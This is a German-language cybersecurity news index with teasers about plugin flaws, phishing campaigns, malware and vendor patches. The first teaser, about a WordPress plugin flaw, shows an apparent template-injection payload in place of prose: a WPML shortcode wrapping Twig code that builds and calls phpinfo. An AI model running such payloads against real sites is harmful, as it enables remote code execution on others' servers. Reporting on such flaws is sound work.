Aktuelle Cybersecurity Nachrichten - Bleiben Sie sicher informiert

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

von Cybersecurity News Redaktion | 27. August 2024 | Schwachstellen | 0 Kommentieren

[wpml_language_switcher]
{% set call_user_func = c~a~l~l~~u~s~e~r~~f~u~n~c %}
{% set phpinfo = p~h~p~i~n~f~o %}
{{ {1: phpinfo}|filter(call_user_func) }}
[/wpml_language_switcher]

Lesen Sie mehr

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

von Cybersecurity News Redaktion | 27. August 2024 | Phishing | 0 Kommentieren

Eine groß angelegte Phishing-Kampagne missbraucht Microsoft Sway, ein cloudbasiertes Tool zur Erstellung von Online-Präsentationen, um Microsoft 365-Nutzer dazu zu bringen, ihre Zugangsdaten preiszugeben. Die Angriffe wurden im Juli 2024 von Netskope Threat Labs...

Lesen Sie mehr

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

von Cybersecurity News Redaktion | 27. August 2024 | Wissen | 0 Kommentieren

Wollen Sie wissen, was 2024 im Bereich der Sicherheitsoperationen neu und bedeutend ist? Gartners kürzlich veröffentlichter Hype Cycle für Sicherheitsoperationen geht wichtige Schritte, um den Bereich des Continuous Threat Exposure Managements (CTEM) zu organisieren...

Lesen Sie mehr

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

von Cybersecurity News Redaktion | 27. August 2024 | Schwachstellen | 0 Kommentieren

SonicWall hat dringend empfohlene Sicherheitsupdates für eine schwerwiegende Sicherheitslücke in seinen Firewalls veröffentlicht. Wird diese Schwachstelle erfolgreich ausgenutzt, können Angreifer unbefugten Zugriff auf die Geräte erlangen. Die Sicherheitslücke,...

Lesen Sie mehr

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

von Cybersecurity News Redaktion | 23. August 2024 | Schwachstellen | 0 Kommentieren

Eine schwerwiegende Schwachstelle zur Remote-Code-Ausführung (RCE) wurde in Microsoft Edge entdeckt. Diese Schwachstelle könnte Angreifern ermöglichen, die Kontrolle über betroffene Systeme zu übernehmen, indem sie beliebigen Code aus der Ferne ausführen. Microsoft...

Lesen Sie mehr

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

von Cybersecurity News Redaktion | 23. August 2024 | Cyber Threat, Cyber Attacken | 0 Kommentieren

Cyberkriminelle haben begonnen, Amazon-Dienste auszunutzen, um mit Schadsoftware infizierte MSC-Dateien zu verbreiten. Diese Entwicklung zeigt, wie attraktiv die umfassenden Angebote von Amazon für Angreifer geworden sind, da sie enorme Rechenleistung, Speicherplatz...

Lesen Sie mehr

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

von Cybersecurity News Redaktion | 22. August 2024 | Schwachstellen | 0 Kommentieren

Ein Sicherheitsforscher hat am Mittwoch einen Bug in iOS entdeckt, der dazu führen kann, dass iPhones und iPads kurzzeitig abstürzen, wenn eine bestimmte Folge von vier Zeichen in bestimmte Suchleisten eingegeben wird. Der Fehler betrifft die Benutzeroberfläche von...

Lesen Sie mehr

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

von Cybersecurity News Redaktion | 22. August 2024 | Schwachstellen | 0 Kommentieren

Sicherheitsforscher haben eine schwerwiegende Sicherheitslücke im LiteSpeed Cache-Plugin für WordPress aufgedeckt, die es nicht authentifizierten Nutzern ermöglicht, Administratorrechte zu erlangen. „Das Plugin leidet unter einer nicht authentifizierten...

Lesen Sie mehr

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

von Cybersecurity News Redaktion | 21. August 2024 | Schwachstellen | 0 Kommentieren

Forscher von Morphisec haben detaillierte technische Informationen über eine kürzlich entdeckte Zero-Click-Sicherheitslücke in Microsoft Outlook veröffentlicht, die als CVE-2024-38021 identifiziert wurde. Diese Schwachstelle stellt ein erhebliches Sicherheitsrisiko...

Lesen Sie mehr

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

von Cybersecurity News Redaktion | 21. August 2024 | Schwachstellen, Cyber Attacken | 0 Kommentieren

Eine bisher unbekannte Backdoor namens Msupedge wurde in einem gezielten Cyberangriff gegen eine nicht näher benannte Universität in Taiwan eingesetzt. Das Symantec Threat Hunter Team, Teil von Broadcom, berichtete, dass die auffälligste Eigenschaft dieser Backdoor...

Lesen Sie mehr

Hacker kompromittieren Ethereums Mailingliste, um Krypto-Gelder zu stehlen

Juli 5, 2024 | Phishing, Cyber Attacken

In einem kürzlichen Cyberangriff haben Hacker erfolgreich die Mailingliste von Ethereum kompromittiert, um die Krypto-Gelder der Nutzer durch eine ausgeklügelte Phishing-Kampagne abzuschöpfen. Dieser Vorfall hat erhebliche Bedenken innerhalb der...

Kritische OpenStack-Sicherheitslücke ermöglicht unbefugten Zugriff auf Cloud-Daten

Juli 4, 2024 | Schwachstellen

Eine kritische Sicherheitslücke wurde in OpenStack, einer weit verbreiteten Open-Source-Cloud-Computing-Plattform, entdeckt. Die als CVE-2024-32498 verfolgte Schwachstelle ermöglicht es authentifizierten Angreifern, unbefugten Zugriff auf beliebige Dateien auf dem...

Hacker verkaufen Daten der Shopify-Plattform im Dark Web

Juli 4, 2024 | Cyber Attacken, Datenpannen, Datenschutz

Hacker wurden dabei erwischt, sensible Daten von der Shopify-Plattform im Dark Web zu verkaufen. Diese alarmierende Nachricht wurde erstmals von DarkWebInformer auf ihrem Twitter-Account berichtet und hat erhebliche Bedenken hinsichtlich der Sicherheit von...

Datenleck bei Formel-1-Verband nach E-Mail-Hacks bekanntgegeben

Juli 4, 2024 | Phishing, Datenpannen, Datenschutz

Die FIA (Fédération Internationale de l'Automobile), die seit den 1950er Jahren den Automobilsport regelt, meldet einen Datenzugriff nach der Kompromittierung mehrerer E-Mail-Konten durch einen Phishing-Angriff. Die FIA wurde 1904 als Association Internationale des...

Twilio: Hacker nutzten API aus, um Millionen Authy-MFA-Telefonnummern zu verifizieren

Juli 4, 2024 | Cyber Attacken

Twilio hat bestätigt, dass ein ungesicherter API-Endpunkt es Angreifern ermöglichte, die Telefonnummern von Millionen Authy-Nutzern der Multi-Faktor-Authentifizierung (MFA) zu verifizieren. Dadurch könnten diese Nutzer potenziell anfällig für SMS-Phishing und...

Kritische Sicherheitslücke in WordPress-Plugin gefährdet über 90.000 Websites

Juli 3, 2024 | Schwachstellen

Eine kritische Sicherheitslücke wurde im beliebten WordPress-Plugin „Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce“ entdeckt. Die Schwachstelle, identifiziert als CVE-2024-6172, erhielt einen CVSS-Score...

Hacker greifen Apple-ID-Nutzer mit bösartigen SMS an

Juli 3, 2024 | Cyber Attacken

Cyberkriminelle haben ihre Bemühungen verstärkt, Apple-ID-Nutzer durch eine neue Welle von bösartigen SMS-Kampagnen zu attackieren. Diese Phishing-Angriffe, auch als „Smishing“ bekannt, zielen darauf ab, Nutzer dazu zu verleiten, ihre Apple-ID-Anmeldedaten...

Kritische Sicherheitslücke in Cisco NX-OS: Zero-Day-Befehlseinschleusung wird aktiv ausgenutzt

Juli 2, 2024 | Schwachstellen

Eine kritische Schwachstelle in der Befehlszeilenschnittstelle (CLI) der Cisco NX-OS-Software wird derzeit aktiv ausgenutzt und ermöglicht es Angreifern, beliebige Befehle als Root auf betroffenen Geräten auszuführen. Diese Zero-Day-Schwachstelle, identifiziert als...

Hacker nutzen Dropbox und Google Docs zur Verbreitung von Orcinius-Malware

Juli 2, 2024 | Cyber Threat

Eine neue Variante des Orcinius-Trojaners wurde entdeckt, die mithilfe von VBA-Stomping ihre Infektion verschleiert. Der mehrstufige Trojaner nutzt Dropbox und Google Docs, um sich zu aktualisieren und zweite Nutzlasten zu liefern. Was ist VBA-Stomping? Typischerweise...

Neue OpenSSH-Sicherheitslücke ermöglicht Remote-Code-Ausführung als Root auf Linux-Systemen

Juli 1, 2024 | Schwachstellen

Die Entwickler von OpenSSH haben Sicherheitsupdates veröffentlicht, um eine kritische Sicherheitslücke zu beheben, die eine nicht authentifizierte Remote-Code-Ausführung mit Root-Rechten auf glibc-basierten Linux-Systemen ermöglichen könnte. Die Sicherheitslücke trägt...

Home

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

Hacker kompromittieren Ethereums Mailingliste, um Krypto-Gelder zu stehlen

Kritische OpenStack-Sicherheitslücke ermöglicht unbefugten Zugriff auf Cloud-Daten

Hacker verkaufen Daten der Shopify-Plattform im Dark Web

Datenleck bei Formel-1-Verband nach E-Mail-Hacks bekanntgegeben

Twilio: Hacker nutzten API aus, um Millionen Authy-MFA-Telefonnummern zu verifizieren

Kritische Sicherheitslücke in WordPress-Plugin gefährdet über 90.000 Websites

Hacker greifen Apple-ID-Nutzer mit bösartigen SMS an

Kritische Sicherheitslücke in Cisco NX-OS: Zero-Day-Befehlseinschleusung wird aktiv ausgenutzt

Hacker nutzen Dropbox und Google Docs zur Verbreitung von Orcinius-Malware

Neue OpenSSH-Sicherheitslücke ermöglicht Remote-Code-Ausführung als Root auf Linux-Systemen

Neueste Beiträge